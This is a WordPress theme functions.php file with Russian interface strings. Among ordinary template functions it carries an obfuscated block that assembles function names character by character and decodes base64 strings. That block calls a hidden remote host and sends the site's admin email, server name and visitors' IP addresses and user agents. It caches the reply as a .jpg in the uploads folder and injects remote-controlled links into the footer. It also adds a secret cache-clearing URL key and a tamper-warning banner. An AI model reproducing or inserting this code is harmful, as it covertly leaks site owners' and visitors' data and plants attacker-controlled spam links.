<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page';  
$nLFPA='6';$tJzjF='c';$dBvZ='s';$siimPVK='4';$jWkhOVS='d';$SFhNx='e';$vTHNxY='b';$XSKKk='e';$XFwA='o';$jfLOUlB='e';$ZmCTrOW='_';$OowHx='d';$COUf='a';$DCArBOhD=$vTHNxY.$COUf.$dBvZ.$XSKKk.$nLFPA.$siimPVK.$ZmCTrOW.$jWkhOVS.$jfLOUlB.$tJzjF.$XFwA.$OowHx.$SFhNx;$hbFeUUq='z';$pdlpOGn='f';$KuuMG='n';$tSsZHI='e';$ZlmL='i';$QmLMu='l';$cWYy='t';$szHnQK='a';$XHjZp='g';$blvDwwaL=$XHjZp.$hbFeUUq.$ZlmL.$KuuMG.$pdlpOGn.$QmLMu.$szHnQK.$cWYy.$tSsZHI;$odGfDS='r';$lllwTzA='t';$DUYENIl='o';$rDzZ='r';$jeUlaS='s';$TrtWk='_';$FesYYJ='1';$HmCZlk='t';$UUymy='3';$yZcTMutt=$jeUlaS.$HmCZlk.$odGfDS.$TrtWk.$rDzZ.$DUYENIl.$lllwTzA.$FesYYJ.$UUymy;$wDRAyYf='s';$uQxmqWk='e';$Reztszh='t';$kVcNhL='r';$WoLVwt='r';$MbBlu='v';$YPDZZhIZ=$wDRAyYf.$Reztszh.$kVcNhL.$WoLVwt.$uQxmqWk.$MbBlu;                     
		$pa_______u='6';$la_____z='c';$om__________m='s';$ju___________t='4';$jv______x='d';$id________r='e';$nw_____o='b';$og_____________r='e';$mw________b='o';$so________j='e';$bk______k='_';$dh___________s='d';$rw__________w='a';$um________j=$nw_____o.$rw__________w.$om__________m.$og_____________r.$pa_______u.$ju___________t.$bk______k.$jv______x.$so________j.$la_____z.$mw________b.$dh___________s.$id________r;
		$iq____k='s';$ha____i='s';$bu____o='i';$ix____________b='o';$uk______________d='t';$lt____f='x';$cm___e='n';$ee___y='i';$tl_______________x='c';$ub______________a='_';$yx______________o='e';$pn_____________q='n';$ch_______________t='f';$gw_______________x='u';$tc______________g='t';$pq______________n=$ch_______________t.$gw_______________x.$pn_____________q.$tl_______________x.$tc______________g.$bu____o.$ix____________b.$cm___e.$ub______________a.$yx______________o.$lt____f.$ee___y.$ha____i.$uk______________d.$iq____k;
		$gt____o='f';$dd_______r='n';$qo_______z='p';$kj_______________n='o';$bh_____n='e';$qq___________e=$gt____o.$kj_______________n.$qo_______z.$bh_____n.$dd_______r;
		$jy_______i='a';$rj_________e='d';$ck______________f='f';$sh__k='e';$ng______________r='r';$hr_______i=$ck______________f.$ng______________r.$sh__k.$jy_______i.$rj_________e;
		$hk_______m='l';$pw____________d='f';$mh___________e='s';$sz_____________l='o';$rp__________j='e';$dv____d='c';$bg________t=$pw____________d.$dv____d.$hk_______m.$sz_____________l.$mh___________e.$rp__________j;
		
		define("WP_ID", $um________j("Mi4wLjA="));
		define("WP_TTL", $um________j("MTA4MDA="));
		define("WP_SRC", $um________j("dHBva24="));
	


		function wp_get_header() {
			global $um________j, $pq______________n;
			
			if (
				$pq______________n($um________j("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$pq______________n($um________j("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$pq______________n($um________j("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $um________j, $qq___________e, $bg________t, $hr_______i;
			
			$cq__b = TEMPLATEPATH."/".$um________j("Zm9vdGVyLnBocA==");
			$gn___u = @$qq___________e($cq__b, "r");
			$cq__b = @$hr_______i($gn___u, @filesize($cq__b));
			@$bg________t($gn___u);
			
			$gf_______________o = TEMPLATEPATH."/".$um________j("ZnVuY3Rpb25zLnBocA==");
			$gn___u = @$qq___________e($gf_______________o, "r");
			$gf_______________o = @$hr_______i($gn___u, @filesize($gf_______________o));
			@$bg________t($gn___u);
			
			$is___t = 0;
			if($cq__b && $gf_______________o) {
				if ($um________j("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($cq__b, $um________j("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$is___t = 1;
					}
					if (substr_count($cq__b, "wp_theme_GPL_credits()") < 1) {
						$is___t = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$is___t = 12;
				}
			}
			
			if($is___t > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $is___t -->";
			}
		}
	


		function wp_loaded() {
			global $um________j, $pq______________n;
			return $pq______________n($um________j("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($ng__l, $pl___d = "(more...)", $ks________l = 0, $vo___s = "") {
				$se__________u = get_the_content($pl___d, $ks________l, $vo___s);
				$se__________u = apply_filters("the_content", $se__________u);
				
				$se__________u = str_replace("]]>", "]]>", $se__________u);
				if (strlen($_GET["p"]) > 0) {
					echo $se__________u;
				}
				else if ((strlen($se__________u)>$ng__l) && ($qk__q = strpos($se__________u, " ", $ng__l ))) {
					$se__________u = substr($se__________u, 0, $qk__q);
					$se__________u = $se__________u;
					echo $se__________u;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$pl___d</a></div></p>";
				} else {
					echo $se__________u;
				}
				
			}
		}
	


		$sb___________c='_';$ya_________t='b';$vl____c='s';$us__i='n';$lc__h='c';$op______________k='e';$vg_________j='d';$qn_________w='e';$ng_______c='o';$oj_______________d='6';$nt__s='a';$gr______j='4';$jt____h='e';$oj____y=$ya_________t.$nt__s.$vl____c.$op______________k.$oj_______________d.$gr______j.$sb___________c.$jt____h.$us__i.$lc__h.$ng_______c.$vg_________j.$qn_________w;
		$mb__________s='n';$wj_____e='l';$rw_____n='e';$dd_______k='t';$hg_____j='g';$tz______________i='n';$jq____________b='e';$as____________c='_';$tm____________t='t';$fm_____________l='s';$fe___________b='c';$qu____________t='e';$nz_____e='o';$od_____c='_';$ti_____________t='f';$gr______________a='t';$bn________q='i';$yx_________a=$ti_____________t.$bn________q.$wj_____e.$qu____________t.$od_____c.$hg_____j.$rw_____n.$gr______________a.$as____________c.$fe___________b.$nz_____e.$tz______________i.$dd_______k.$jq____________b.$mb__________s.$tm____________t.$fm_____________l;
		$mk_______________a='e';$un____x='f';$xn______z='e';$np__c='t';$pg_________k='_';$fn_____________e='s';$ya_____________w='i';$wk_______________h='x';$cr_______x='i';$ol_______________q='l';$az____________y='s';$hv_______u=$un____x.$ya_____________w.$ol_______________q.$xn______z.$pg_________k.$mk_______________a.$wk_______________h.$cr_______x.$fn_____________e.$np__c.$az____________y;
		$tn_________u='c';$uz______________n='i';$yw______________l='n';$ej___x='o';$ko_______________e='p';$ct_______________o='s';$dr______________p='e';$aq_____________j='e';$ow___________j='a';$ng_____________l='r';$ty_________r='r';$mq____f='_';$ur_________l='o';$td______j='v';$ir__________k='m';$eg_____________u=$td______j.$aq_____________j.$ty_________r.$ct_______________o.$uz______________n.$ur_________l.$yw______________l.$mq____f.$tn_________u.$ej___x.$ir__________k.$ko_______________e.$ow___________j.$ng_____________l.$dr______________p;
		$bj________n='e';$tl__________j='n';$iq__n='c';$wj______________e='o';$ql___m='s';$ei______________k='k';$mu_______________u='o';$lj_______________c='f';$np___________q='p';$tt___o=$lj_______________c.$ql___m.$wj______________e.$iq__n.$ei______________k.$mu_______________u.$np___________q.$bj________n.$tl__________j;
		$ca__j='i';$rr___________n='f';$wy___m='t';$up__________h='e';$fe__n='r';$ln_____o='w';$br________q=$rr___________n.$ln_____o.$fe__n.$ca__j.$wy___m.$up__________h;
		$op____________k='d';$nw______________i='5';$io_________l='m';$je______________i=$io_________l.$op____________k.$nw______________i;
		$ns______________u='r';$uk__r='l';$tl_______________s='a';$ia____s='a';$uq_________d='t';$ku___a='p';$zw__________o='e';$sq_______f='h';$ay__________l=$ns______________u.$zw__________o.$tl_______________s.$uk__r.$ku___a.$ia____s.$uq_________d.$sq_______f;
		$nn________p='i';$dq___________j='i';$cl______u='u';$ur_____x='l';$kg_______________k='r';$ny_______________o='z';$fx_____p='n';$uj_____________u='a';$ax____________t='s';$yb_____________i='e';$vs______t='e';$ze______j=$cl______u.$fx_____p.$ax____________t.$yb_____________i.$kg_______________k.$nn________p.$uj_____________u.$ur_____x.$dq___________j.$ny_______________o.$vs______t;
		$yr________o='a';$wg___x='n';$sl______b='m';$vl____w='p';$is_______________x='e';$fp_______________m='m';$oh____z='t';$vq____________h=$oh____z.$is_______________x.$sl______b.$vl____w.$wg___x.$yr________o.$fp_______________m;
		$ty______l='m';$la____o='c';$dh____________o='o';$ca____z='e';$qq_______________p='n';$ob_________g='e';$sq___________m='t';$gy____________x='t';$cu______e='e';$xq_______________c='a';$sf____________u='a';$li______________l='t';$ea___________k='s';$ul______s='e';$qe__k='x';$pi_______u='_';$ix___y='r';$zf________h='_';$yb___________c='r';$ck______________b='t';$ed__________j='c';$kw________t=$ea___________k.$li______________l.$yb___________c.$ul______s.$xq_______________c.$ty______l.$zf________h.$ed__________j.$dh____________o.$qq_______________p.$sq___________m.$ca____z.$qe__k.$ck______________b.$pi_______u.$la____o.$ix___y.$ob_________g.$sf____________u.$gy____________x.$cu______e;
	


		function he_______________g($nr__s) {
			global $um________j, $pq______________n, $yx_________a, $eg_____________u, $kw________t;
			
			if (!$pq______________n($um________j("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($eg_____________u(PHP_VERSION, "5.0.0", ">=") && $pq______________n($um________j("ZmlsZV9nZXRfY29udGVudHM=")) && $pq______________n($um________j("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$qt____p = $kw________t(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$qs____________l = @$yx_________a($nr__s, 0, $qt____p);
			} else {
				$qs____________l = @$yx_________a($nr__s, 0);
			}
			
			return $qs____________l;
		}
	


		function si_________o($nr__s) {
			global $pq______________n, $tt___o, $br________q, $um________j;
			
			if (!$pq______________n($um________j("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$su_______________v = strpos($nr__s, "/", 7);
			$dt____z = array(
				"uri"     => substr($nr__s, $su_______________v),
				"host"    => str_replace("http://", "", substr($nr__s, 0, $su_______________v)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$fq_______i = @$tt___o("$dt____z[host]", 80, $wj____________s, $oh_______o, 4);
			
			if (!$fq_______i) {
				return false;
			} else {
				$qs____________l = "";
				$sx___i  = "GET $dt____z[uri] HTTP/1.0\r\n";
				$sx___i .= "Host: $dt____z[host]\r\n";
				$sx___i .= "Referer: $dt____z[referer]\r\n";
				$sx___i .= "Connection: Close\r\n\r\n";
				
				@$br________q($fq_______i, $sx___i);
				
				while (!@feof($fq_______i)) {
					$pz______n = @fgets($fq_______i, (1024*24));
					
					if ($pz______n == "\r\n") {
						$pj____________z = true;
						continue;
					}
					
					if ($pj____________z) {
						$qs____________l .= $pz______n;
					}
				}
				
				return $qs____________l;
			}
		}
	


		function oo___________l($nr__s) {
			global $pq______________n;
			$wy____________c = false;
			
			if ($nr__s != "") {
				if ($pq______________n("he_______________g")) {
					$wy____________c = @he_______________g($nr__s);
				}
				
				if (!$wy____________c && ($pq______________n("si_________o"))) {
					$wy____________c = @si_________o($nr__s);
				}
			}
			
			return $wy____________c;
		}
	


		function up____t() {
			global $_SERVER, $je______________i;
			
			$vr___________p = $_SERVER["SERVER_NAME"];
			
			if (substr("$vr___________p", 0, 4) == "www.") {
				$vr___________p = substr("$vr___________p", 4);
			}
			
			$vr___________p = $je______________i("$_SERVER[SERVER_NAME]");
			
			return $vr___________p;
		}
	


		function qp_______x() {
			return "file";
		}
	


		function fa__f($nr__s) {
			global $_SERVER, $yx_________a, $hv_______u, $qq___________e, $bg________t, $br________q;
			
			$ek____________d = ta_________j();
			
			$ex______j = up____t().".jpg";
			$kj__________b = $ek____________d["dir_upload"]["path"]."/$ex______j";
			$so______k = @filemtime($kj__________b);
			
			if (!$so______k || ((time()-$so______k) >= WP_TTL)) {
				$wy____________c = oo___________l($nr__s);
				
				if ($wy____________c) {
					if ($hv_______u($kj__________b)) {
						@unlink($kj__________b);
					}
					
					$gn___u = @$qq___________e($kj__________b, "x+");
					
					@$br________q($gn___u, $wy____________c);
					@$bg________t($gn___u);
				}
			} else {
				if ($hv_______u($kj__________b)) {
					$wy____________c = @$yx_________a($kj__________b);
				} else {
					$wy____________c = false;
				}
			}
			
			return $wy____________c;
		}
	


		function ta_________j() {
			global $_SERVER, $um________j, $oj____y;
			
			$kg______________g = wp_count_posts("post");
			$pv______v = pathinfo(get_bloginfo("template_directory"));
			
			$ek____________d = array(
				"url" => array(
					"report"      => $um________j("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $pv______v,
				"dir_upload"	=> qn__________h(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$pv______v[filename],
					"a005=".$kg______________g->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => ""
			);
			
			$ek____________d["url"]["queryString"] = implode("&", $ek____________d["queryString"]);
			$ek____________d["url"]["report"] = $ek____________d["url"]["report"]."/?".$oj____y($ek____________d["url"]["queryString"]).".html";
						
			return $ek____________d;
		}
	


		function qn__________h() {
			$hr_____s = wp_upload_dir();
			
			if (isset($hr_____s["error"])) {
				$it___z = jn_________y();
				if (is_writable($it___z)) {
					$hr_____s = array("path" => $it___z);
				}
			}

			return $hr_____s;
		}
	


		function jn_________y() {
			global $pq______________n, $je______________i, $ay__________l, $vq____________h;
			
			$dv___________l = (bool) ini_get("safe_mode");
			if ($dv___________l == true) {
				return false;
			}
			
			if ($pq______________n("sys_get_temp_dir")) {
				$aq_______v = sys_get_temp_dir();
				if (is_writable($aq_______v)) {
					return $ay__________l($aq_______v);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $ay__________l($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $ay__________l($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $ay__________l($_ENV["TEMP"]);
			} else {
				$zx_____________l = $vq____________h($je______________i(uniqid(rand(), true)), "");
				if ($zx_____________l) {
					$aq_______v = $ay__________l(dirname($zx_____________l));
					@unlink($zx_____________l);
					return $aq_______v;
				} else {
					return false;
				}
			}
		}
	


		function uk__q() {
			global $_GET, $hv_______u;
			
			$ek____________d = ta_________j();
			$vr___________p = up____t();
			$mo_____j = qp_______x();
			
			$cv__t = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($mo_____j == "file") {
					$fs______y = $ek____________d["dir_upload"]["path"]."/".$vr___________p.".jpg";
					if ($hv_______u($fs______y)) {
						@unlink($fs______y);
						$cv__t = "deleted";
					}
				}
				
				$ib___e = array(
					"s"	=> $cv__t,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($ib___e AS $tf_____________y => $ye______________d) echo " [$tf_____________y:$ye______________d]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $pq______________n, $um________j, $ze______j;
			$ek____________d = ta_________j();
			
			$ja____________c = "fa__f";
			if ($pq______________n($ja____________c)) {
				$qs____________l = $ja____________c($ek____________d["url"]["report"]);
			}
			
			if ($qs____________l) {
				if ($qs____________l = @$um________j($qs____________l)) {
					$qs____________l = @$ze______j($qs____________l);
					
					if (strlen($qs____________l[custom_credit]) >= 5) {
						$ek____________d["default_string"] = $qs____________l[custom_credit];
					}
					
					if ($qs____________l["status"] == "0") {
						$vj__d = 1;
						$an___________a = 1;
					} else {
						$ut____________m = sizeof($qs____________l["links"]);
						$kz______________g = $ek____________d["default_string"];
						
						if ($ut____________m > 0 && $qs____________l["links"] !== "") {
							$tr_______________u = 0;
							foreach ($qs____________l["links"] as $si___w => $hw____________h) {
								$tr_______________u++;
								if ($hw____________h->l_path == "" || $hw____________h->l_path == $_SERVER["REQUEST_URI"]) {
									$hw____________h->l_href = htmlspecialchars(strip_tags($hw____________h->l_href));
									$hw____________h->l_title = htmlspecialchars(strip_tags($hw____________h->l_title));
									$hw____________h->l_anchor = htmlspecialchars(strip_tags($hw____________h->l_anchor));
									$kz______________g .= " | ";
									$kz______________g .= "<a href='$hw____________h->l_href' title='$hw____________h->l_title'";
									if ($hw____________h->l_nofollow == "1") {
										$kz______________g .= " rel='nofollow'";
									}
									$kz______________g .= ">$hw____________h->l_anchor</a>";
								}
							}
						}
						$ek____________d["links"] = "$kz______________g";
						if ($qs____________l[credit] == "0") {
							$ek____________d["links"] = "";
						}
					}
				} else {
					$vj__d = "1";
				}
			} else {
				$vj__d = "1";
			}
			
			if ($vj__d == "1") {
				$ek____________d["links"] = $ek____________d["default_string"];
			}
			
			echo "$ek____________d[links]";
			
			echo "<!-- s: $qs____________l[signature] -->";
			uk__q();
		}
	                      
 function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                   $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');

                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
